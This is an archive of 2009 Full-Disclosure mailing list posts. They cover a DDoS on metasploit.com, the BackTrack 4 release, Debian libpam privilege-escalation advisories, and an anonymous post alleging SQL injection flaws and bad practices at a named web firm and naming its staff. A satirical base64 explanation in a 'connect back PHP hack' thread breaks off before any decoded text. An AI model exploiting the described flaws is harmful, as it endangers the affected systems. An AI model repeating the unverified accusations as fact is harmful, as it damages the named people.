<5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> Message-ID: <4992F628.5090500@csuohio.edu> > that's all fine and dandy. still can't reach port 80. > Have you tried using OpenDNS, etc. to see if it resolves? eg: host -t a www.metasploit.org *208.67.222.222 Perhaps your school/employeer/ISP has decided that Metasploit is off-limits. ~Mike.* From staticrez at gmail.com Wed Feb 11 16:05:08 2009 From: staticrez at gmail.com (sr.) Date: Wed, 11 Feb 2009 11:05:08 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <4992F628.5090500@csuohio.edu> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

<5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com><4992EC16.5090802@csuohio.edu><5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com><4992F628.5090500@csuohio.edu><5d80962a0902110805x1924179s7062d71836918912@mail.gmail.com> Message-ID: The incoming connection rate has exceeded 15Mbps of just SYN packets, so we decided to point www.metasploit.com and metasploit.com back to 127.0.0.1 for a little while. This is more to keep our ISP happy than any fear of bandwidth charges. We ran a packet capture of the incoming SYN traffic for about 8 hours; it takes up approximately 60Gb of disk space. In the meantime, if you want to access the Metasploit web site, please use: http://metasploit.org -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jeremy Brown Sent: Wednesday, February 11, 2009 8:34 AM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] metasploit.com = 127.0.0.1 balliwicked2 On Wed, Feb 11, 2009 at 11:05 AM, sr. wrote: > Well, i can resolve the IP's just fine. just can't connect to port 80. > I'm the fw / network person at my job, and i don't remember adding a > rule for this :-P > > I can get there just fine now, seemed inaccessible to me for a short time. > > thx all... > > fabrizio > > On Wed, Feb 11, 2009 at 11:00 AM, Michael Holstein > wrote: >> >>> that's all fine and dandy. still can't reach port 80. >>> >> >> Have you tried using OpenDNS, etc. to see if it resolves? >> >> eg: host -t a www.metasploit.org *208.67.222.222 >> >> Perhaps your school/employeer/ISP has decided that Metasploit is off-limits. >> >> ~Mike.* >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ DISCLAIMER: This message (including any files transmitted with it) may contain confidential and?/?or proprietary information, is the property of Interactive Data Corporation and?/?or its subsidiaries and is directed only to the addressee(s). If you are not the designated recipient or have reason to believe you received this message in error, please delete this message from your system and notify the sender immediately. An unintended recipient's disclosure, copying, distribution or use of this message, or any attachments, is prohibited and may be unlawful. From tbiehn at gmail.com Wed Feb 11 17:51:54 2009 From: tbiehn at gmail.com (T Biehn) Date: Wed, 11 Feb 2009 12:51:54 -0500 Subject: [Full-disclosure] Fuzzing for Fun and Profit In-Reply-To: <20090211170148.A4B76158045@smtp.hushmail.com> References: <20090211170148.A4B76158045@smtp.hushmail.com> Message-ID: <2d6724810902110951i5e7d459di7c8ef22863be0f22@mail.gmail.com> release something that fuzzes web services given a WSDL. OR * Grammer file. state awareness given history, state munging, branch on prior states. Like: A->B->C->D Transaction 1 A1->B1->C1 Transaction 2 REPLAY from B1 B1->C2->D2 Transaction 1 C1->D1 OR A3->D3 D3->A3 (Send init packet with mundgery permute over *States if it permits.) Run all permutations and branches from all steps, with all possible delays. Learn if it "supports" your test then drop your test if it doesn't work. You won't worry about running out of shit to test, and you'll finally justify the cost of some sweet new hardware to run this on. -or- Learn how to audit code? This might be too much CS for you, but if you plug away you might learn something :.) I'm sure you'll get a talking spot and mad whitehat dollars if you do. On Wed, Feb 11, 2009 at 12:01 PM, wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Dear tal0n. > > when will you do something that hasn't been done and is even > relevant or practical in 2009? fuzzing sftp and command line > arguments/env variables... nice and 2000AD "oh but its setuid(0)" > yeah on your box and the 5 other people who download it to write > useless papers/exploits to feel like they are smart/doing something > (hi prdelka). When is the last time a sftpd exploit was useful? > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQMCAAYFAkmTBHwACgkQhtejBzrM32l9fAP+L5pGZYr3uQVaRUNh0hrO91/EjR8j > Eh/OLWWnhvEneGDwra2YR70R4AV0YDx3/wey/McNmiICu16xRLopvapqVdV2VVS5/1eP > z6lqWg3Rs+vZQuSEjmblxvhPLgb9dLBRr60qbKPfGPEZKssv3akkxZOmm9no8P1KX8wP > JU2A26Q= > =Iy18 > -----END PGP SIGNATURE----- > > -- > Too many bills? Click here to simplify your life and lower your debt. > > http://tagline.hushmail.com/fc/PnY6qxtUbhP9WqQxe5tCHOKDJDbyevAbhO9MFNhCEbIMLazpKKNbq/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090211/edb34ba6/attachment.html From muts at offensive-security.com Wed Feb 11 16:37:37 2009 From: muts at offensive-security.com (Mati Aharoni) Date: Wed, 11 Feb 2009 11:37:37 -0500 Subject: [Full-disclosure] BackTrack 4 Beta Released Message-ID: <8b0e09fc0902110837k70e83f9bqa514e19465347a03@mail.gmail.com> The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. We have taken huge conceptual leaps with BackTrack 4, and have some new and exciting features. The most significant of these changes is our expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution". Now based on Debian core packages and utilizing the Ubuntu software repositories, BackTrack 4 can be upgraded in case of update. When syncing with our BackTrack repositories, you will regularly get security tool updates soon after they are released. Some of the new features include: * Kernel 2.6.28.1 with better hardware support. * Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines. * Support for PXE Boot - Boot BackTrack over the network with PXE supported cards! * SAINT EXPLOIT - kindly provided by SAINT corporation for our users with a limited number of free IPs. * MALTEGO - The guys over at Paterva did outstanding work with Maltego 2.0.2 - which is featured in BackTrack as a community edition. * The latest mac80211 wireless injection patches are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional. * Unicornscan - Fully functional with postgres logging support and a web front end. * RFID support * Pyrit CUDA support... * New and updated tools - the list is endless! With all these changes, PLUS the usual goodies and surprises we have in BackTrack, we are truly excited about this new release. We consider the Beta to be stable and usable. Some tools were kept back from this version, and will be soon added to the repositories. Downloads can be found here : http://www.remote-exploit.org/backtrack_download.html Keep safe, The Remote Exploit Team From jmm at debian.org Wed Feb 11 20:58:04 2009 From: jmm at debian.org (Moritz Muehlenhoff) Date: Wed, 11 Feb 2009 21:58:04 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1721-1] New libpam-krb5 packages fix local privilege escalation Message-ID: <20090211205803.GA4136@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1721-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 11, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libpam-krb5 Vulnerability : several Problem type : local Debian-specific: no CVE Id(s) : CVE-2009-0360 CVE-2009-0361 Several local vulnerabilities have been discovered in the PAM module for MIT Kerberos. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0360 Russ Allbery discovered that the Kerberos PAM module parsed configuration settings from enviromnent variables when run from a setuid context. This could lead to local privilege escalation if an attacker points a setuid program using PAM authentication to a Kerberos setup under her control. CVE-2009-0361 Derek Chan discovered that the Kerberos PAM module allows reinitialisation of user credentials when run from a setuid context, resulting in potential local denial of service by overwriting the credential cache file or to privilege escalation. For the stable distribution (etch), these problems have been fixed in version 2.6-1etch1. For the upcoming stable distribution (lenny), these problems have been fixed in version 3.11-4. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your libpam-krb5 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1.dsc Size/MD5 checksum: 670 e24d2e134c78f26f571ae691a4dd3209 http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6.orig.tar.gz Size/MD5 checksum: 119752 5742d0fb75ac148b7748387bc295f472 http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1.diff.gz Size/MD5 checksum: 11016 93ab13d570cbb2938e703fef2f06581e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_alpha.deb Size/MD5 checksum: 58440 a526c51fb9e6c4193b8591000ff7b632 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_amd64.deb Size/MD5 checksum: 57502 d8607f991e0da76e191bc2c468c7ed59 arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_arm.deb Size/MD5 checksum: 55372 e90de3bd06a9fc12d61866e718896c2e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_hppa.deb Size/MD5 checksum: 58952 0774be83acdc3e36ddf9c55bbfc9ee16 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_i386.deb Size/MD5 checksum: 56726 9d3eb6c5e1954393cde41f73b3824190 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_ia64.deb Size/MD5 checksum: 62910 874687c0aba8ecbce11bd126ff5c2585 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mips.deb Size/MD5 checksum: 56894 0f10eccba6afdc540c23a39728df0bc9 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mipsel.deb Size/MD5 checksum: 56886 55d1faffac772a008d46674442f480f9 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_powerpc.deb Size/MD5 checksum: 58572 66ecfa0eb67c381dc8b2a63a1d7dec44 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_s390.deb Size/MD5 checksum: 57928 73b6597abb7682378667210bd980a8b2 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_sparc.deb Size/MD5 checksum: 56390 7896f97c1d3b2daa5e94a195a12a11a6 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkmTO4kACgkQXm3vHE4uylrXlwCfXryID0RL+Pt+F5IrMGYlI6GP Fy8Anje/tPsQUC5b7E0D0ZY2EzD3n91p =ACs+ -----END PGP SIGNATURE----- From jmm at debian.org Wed Feb 11 21:04:35 2009 From: jmm at debian.org (Moritz Muehlenhoff) Date: Wed, 11 Feb 2009 22:04:35 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1722-1] New libpam-heimdal packages fix local privilege escalation Message-ID: <20090211210435.GA4248@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1722-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 11, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libpam-heimdal Vulnerability : programming error Problem type : local Debian-specific: no CVE Id(s) : CVE-2009-0361 Derek Chan discovered that the PAM module for the Heimdal Kerberos implementation allows reinitialisation of user credentials when run from a setuid context, resulting in potential local denial of service by overwriting the credential cache file or to local privilege escalation. For the stable distribution (etch), this problem has been fixed in version 2.5-1etch1. For the upcoming stable distribution (lenny), this problem has been fixed in version 3.10-2.1. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your libpam-heimdal package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1.dsc Size/MD5 checksum: 699 09e39eb1552950761fdcc51babceef11 http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1.diff.gz Size/MD5 checksum: 8208 3e178b9617aadc2e030c07fec659330c http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5.orig.tar.gz Size/MD5 checksum: 117834 a80c66fcf0c48608abfb5ff0c443ab94 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_amd64.deb Size/MD5 checksum: 38348 a9b7ddbb56515616567b46ead7d48213 arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_arm.deb Size/MD5 checksum: 36226 bdfaa1037d3b02494f28d2da628e038f hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_hppa.deb Size/MD5 checksum: 39432 f721ac5acbaeb33f26c6387ccc4e73da i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_i386.deb Size/MD5 checksum: 37652 c1b56b35fb35c0d700de6ea53d753a4e ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_ia64.deb Size/MD5 checksum: 43594 2238be62f72a01bbac329d2b5dc0bbe4 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_mips.deb Size/MD5 checksum: 37544 80164efa305002d37aeb9c67b1a41f09 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_mipsel.deb Size/MD5 checksum: 37534 7d911ce54e2e8f078f117984ffbe4b97 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_powerpc.deb Size/MD5 checksum: 39256 076218cc619f405bb07016ecb2eeaef6 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_s390.deb Size/MD5 checksum: 38826 be7ee31cad3f876e7f2a343d8cf9f413 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_sparc.deb Size/MD5 checksum: 37166 bc2d46af607a9acd7978f6973cdc5ecf These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkmTPPMACgkQXm3vHE4uylpNrQCgubliWx2XLOuiece2KpczkcsC FEwAn1OXJGgjyV3dIyGX6opMEM5nwfrc =k2FA -----END PGP SIGNATURE----- From angrycustomer at hushmail.com Wed Feb 11 20:44:19 2009 From: angrycustomer at hushmail.com (angrycustomer at hushmail.com) Date: Wed, 11 Feb 2009 15:44:19 -0500 Subject: [Full-disclosure] Cambiumgroup customers get hacked fast! Message-ID: <20090211204419.AD49328042@smtp.hushmail.com> Thought this might be the place to send this. We were using the content system that cambiumgroup created and it resulted in me losing my job because my employer got hacked. When I googled them I found this posting in google's cache. http://74.125.47.132/search?q=cache:PtwMBLcvxxsJ:www.vermontinternet design.com/index.php%3Ftopic%3D597.0+cambiumgroup+Vulnerabilities&hl =en&ct=clnk&cd=3&gl=us&client=safari Hello everyone I would like to share this post with everyone here on my site. I would like to talk about the safety of your email accounts and what is being done to protect them. Why its important that the owner of a web development company understands what they are doing. Well email accounts are prolly the most vulnerable part of any web server. Simply because email accounts are typically the most benifical to someone who is trying to breach your webserver. It is profitable for a hacker to breach an email account. Why? Well why is it profitable for you to do an email blast. The same reason it is for a hacker to do one. I was working for a company in St. Johnsbury Vermont (Cambium Group LLC) for a couple of months. I was hired to do a backlog of projects that the lead developer obviously wasnt capable of doing. While I was working at this place I had noticed that someone had unauthorized access to the companies internal webservers. I mentioned to the owner of the company that someone had unauthorized access to the web server. He thought that I was crazy that someone could have possibly done that. I simply couldnt sleep at night. I checked the webserver and found they were using a website monitoring service that had been hacked into. Meaning there was a program that they used that access all of the client webservers from there development server. Upon talking to the owner and Secretary of this company. I learned that either one of the owner of Cambium group or the Sales lady would admit that there was a problem. They were to worried about protecting a reputation than securing a web server. After this incident I decided to do a further investigation. Upon closing my investigation I learned that the people that I was working for were selling a very unsecured content management system to Credit Unions. They had told me they wanted me to protect there clients accounts and websites. However when I mentioned that there were alot of security holes they didnt want to take action to protect there customers. They simply did not care. I would like to make everyone aware of all of the problems that I found when working with http://www.cambiumgroup.com . 1) I found that all of there webservers use the same configuration. Big no no when you are working with banks. 2) I found that large volumes of spam was being sent from company and customer email accounts. Many customers were complaining that emails where being sent that they never sent. 3) I found that adding malformed urls to there content management system will allow a remote user to run mysql queries directly on there database. 4) I found that the admin password is the same on 100 websites 5) I found that the content management system would vulnerable to bolth html injection and sql injection. 6) I found that there lead developer Jason Leno only knows basic programming skills and denies that the someone would be able to cause a problem due to the above issues. 7) I found that the web forms they were using on there Content Management system would allow someone to send an email to a mailing list. 8) I found that Scott Wells and Shari Choinard had no interest in protecting there customers from the above issues. 9) I found out that they were charging $20,000 - $50,000 for an application that opens up the clients to the above vulnerabilities. 10) After working at this company for 2 months I learned that the secretary Shari, and Scott Wells live together and neither one of them knows anything about computer programming. I am putting this posting here so to protect the customers of that company. I know there are paying alot of money for what they got and for the amount of money they are charged they should not be opened up to these security problems. -- Be a professional. Click here to earn a psychology degree. http://tagline.hushmail.com/fc/PnY6qxultlrtwxI8C5TG1niHYrBtAWdFS2UrVp0KDdMdGEikS5kUY/ From erc at pobox.com Wed Feb 11 21:26:05 2009 From: erc at pobox.com (Ed Carp) Date: Wed, 11 Feb 2009 13:26:05 -0800 Subject: [Full-disclosure] Cambiumgroup customers get hacked fast! In-Reply-To: <20090211204419.AD49328042@smtp.hushmail.com> References: <20090211204419.AD49328042@smtp.hushmail.com> Message-ID: <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com> It's really hard to take someone seriously who can't even spell or produce something even close to grammatically correct English. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090211/89b92cab/attachment.html From lukasz at bromirski.net Wed Feb 11 23:36:26 2009 From: lukasz at bromirski.net (=?ISO-8859-2?Q?=A3ukasz_Bromirski?=) Date: Thu, 12 Feb 2009 00:36:26 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1721-1] New libpam-krb5 packages fix local privilege escalation In-Reply-To: <20090211205803.GA4136@galadriel.inutil.org> References: <20090211205803.GA4136@galadriel.inutil.org> Message-ID: <499360FA.3080200@bromirski.net> On 2009-02-11 22:08, Justin Shore wrote: > I set 'ip tcp path-mtu-discovery' on all my boxes by default, and the > vast majority of them still assumed 516 or 536 MSS. Then something is messing up PMTUD. -- "Don't expect me to cry for all the | ?ukasz Bromirski reasons you had to die" -- Kurt Cobain | http://lukasz.bromirski.net From nabu at absolom.ro Thu Feb 12 00:44:54 2009 From: nabu at absolom.ro (Elite Nabukadnezar) Date: Thu, 12 Feb 2009 02:44:54 +0200 Subject: [Full-disclosure] Cambiumgroup customers get hacked fast! In-Reply-To: <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com> References: <20090211204419.AD49328042@smtp.hushmail.com> <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com> Message-ID: Wow can you be more ignorant? So if someone is born in, let's say, Romania, and English is not his first language, will that mean his opinions can't be taken seriously when he misspells? ----- Original Message ----- From: Ed Carp To: full-disclosure at lists.grok.org.uk Sent: Wednesday, February 11, 2009 11:26 PM Subject: Re: [Full-disclosure] Cambiumgroup customers get hacked fast! It's really hard to take someone seriously who can't even spell or produce something even close to grammatically correct English. ------------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090212/e790f734/attachment.html From prb at lava.net Thu Feb 12 01:46:06 2009 From: prb at lava.net (Peter Besenbruch) Date: Wed, 11 Feb 2009 15:46:06 -1000 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> Message-ID: <200902111546.07085.prb@lava.net> On Wednesday 11 February 2009 06:51:36 Lehman, Jim wrote: > The incoming connection rate has exceeded 15Mbps of just SYN packets, so > we decided to point www.metasploit.com and metasploit.com back to > 127.0.0.1 for a little while. This is more to keep our ISP happy than > any fear of bandwidth charges. We ran a packet capture of the incoming > SYN traffic for about 8 hours; it takes up approximately 60Gb of disk > space. In the meantime, if you want to access the Metasploit web site, > please use: http://metasploit.org Also from the Metasploit site: Feb-09-2009 Pathetic DDoS vs Metasploit (round 2) (hdm) It looks like our little DDoS buddy got sent home from school early today -- the flood started up again, this time ignoring the DNS name for the metasploit.com web site and instead targeting both IP addresses configured on the server. While SSL service is still unaffected (including Online Update over SVN), folks who wish to visit the Metasploit web site will need to do so using an alternate port until we roll out the next countermeasure. http://metasploit.com:8000/ We also host the main web server for Attack Research, which can now be accessed at: http://www.attackresearch.com:8000/ Thanks for your patience, Feb-08-2009 Pathetic DDoS vs Security Sites (hdm) On Friday, starting around 9:00pm CST, the main metasploit.com was hit with a highly-annoying, if pretty useless distributed denial of service. The attack consisted of a botnet-sourced connection flood against port 80 for the metasploit.com host name. This flood consisted of about 80,000 connections per second, all from real hosts trying to send a simple HTTP request. At the same time, Packet Storm and Milw0rm were being hit as well. About 95% of the bots would intermittently resolve metasploit.com and follow the target address with the connection flood. The other 5% continued to bang on the main metasploit.com IP address and port even after the host record was changed. Solving this involved parking the metasploit.com host record at 127.0.0.1 and moving the other host names and services to a spare IP address. This allows for www.metasploit.com and most of our other domains and services to work properly. The only drawback is that until the flooding stops, we can't use the metasploit.com A record, which happens to be the default for updating the Metasploit Framework installation. A fun side effect is that they handed us full control of the DDoS stream: we can point the metasploit.com record anywhere we like and the connection flood will follow it. We will continue to find other ways to mitigate the flood; but until we can safely use the metasploit.com name again, our standard online update mechanism is going to fail. If you are trying to check out a fresh copy of Metasploit from subversion, use the https://www.metasploit.com/svn/framework3/ URL for now. As of 9:30am CST, the Immunity web site is being hit as well. If anyone has information on the folks involved, we would love to hear from you :-) -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky From angrycustomer at hushmail.com Thu Feb 12 02:00:56 2009 From: angrycustomer at hushmail.com (angrycustomer at hushmail.com) Date: Wed, 11 Feb 2009 21:00:56 -0500 Subject: [Full-disclosure] Cambiumgroup customers get hacked fast! Message-ID: <20090212020056.3B0C01A003A@smtp.hushmail.com> Ed, click on the link that I provided to you. That will show you who the author was. You do know how to click a link, right? On Wed, 11 Feb 2009 16:26:05 -0500 Ed Carp wrote: >It's really hard to take someone seriously who can't even spell or >produce >something even close to grammatically correct English. -- Wanna lose weight? Weight Loss Programs that work. Click here. http://tagline.hushmail.com/fc/PnY6qxuJ7V7mSLLJ2YEYa3q2UrwYLoPJmIlrK61tD6HBwlUcdnFAs/ From fdiggle at gmail.com Thu Feb 12 06:52:40 2009 From: fdiggle at gmail.com (Fredrick Diggle) Date: Thu, 12 Feb 2009 00:52:40 -0600 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: Fredrick Diggle Security has taken it upon itself to reverse this highly mystical encryption schema and has employed its crack cryptanalysis experts and reverse engineers including the highly acclaimed Mustache to get answers to your questions. The team has spent a restless 48 hours reverse engineering this schema and presents the following formal analysis to the cryptographic community at large. 1. High Level Overview A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.) The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the encrypted alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string. Table 1: Alphabetic Substitution Value Encoding Value Encoding Value Encoding Value Encoding 0 A 17 R 34 i 51 z 1 B 18 S 35 j 52 0 2 C 19 T 36 k 53 1 3 D 20 U 37 l 54 2 4 E 21 V 38 m 55 3 5 F 22 W 39 n 56 4 6 G 23 X 40 o 57 5 7 H 24 Y 41 p 58 6 8 I 25 Z 42 q 59 7 9 J 26 a 43 r 60 8 10 K 27 b 44 s 61 9 11 L 28 c 45 t 62 + 12 M 29 d 46 u 63 / 13 N 30 e 47 v 14 O 31 f 48 w (pad) = 15 P 32 g 49 x 16 Q 33 h 50 y Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character. Since all encrypted input is an integral number of octets, only the following cases can arise: (1) the final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding, (2) the final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters, or (3) the final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character. 2. Illustrations and examples To translate between binary and this encryption schema, the input is stored in a structure and the output is extracted. This relationship is displayed in the following figure. +--first octet--+-second octet--+--third octet--+ |7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0| +-----------+---+-------+-------+---+-----------+ |5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0| +--1.index--+--2.index--+--3.index--+--4.index--+ The following is an example of this schema in use. Input data: 0x14fb9c03d97e Hex: 1 4 f b 9 c | 0 3 d 9 7 e 8-bit: 00010100 11111011 10011100 | 00000011 11011001 11111110 6-bit: 000101 001111 101110 011100 | 000000 111101 100111 111110 Decimal: 5 15 46 28 0 61 37 62 Output: F P u c A 9 l + Input data: 0x14fb9c03d9 Hex: 1 4 f b 9 c | 0 3 d 9 8-bit: 00010100 11111011 10011100 | 00000011 11011001 pad with 00 6-bit: 000101 001111 101110 011100 | 000000 111101 100100 Decimal: 5 15 46 28 0 61 36 pad with = Output: F P u c A 9 k = Input data: 0x14fb9c03 Hex: 1 4 f b 9 c | 0 3 8-bit: 00010100 11111011 10011100 | 00000011 pad with 0000 6-bit: 000101 001111 101110 011100 | 000000 110000 Decimal: 5 15 46 28 0 48 pad with = = Output: F P u c A w = = 3. Conclusions Given this analysis of the provided data it is clear that when decrypted the clear text of the encrypted string : 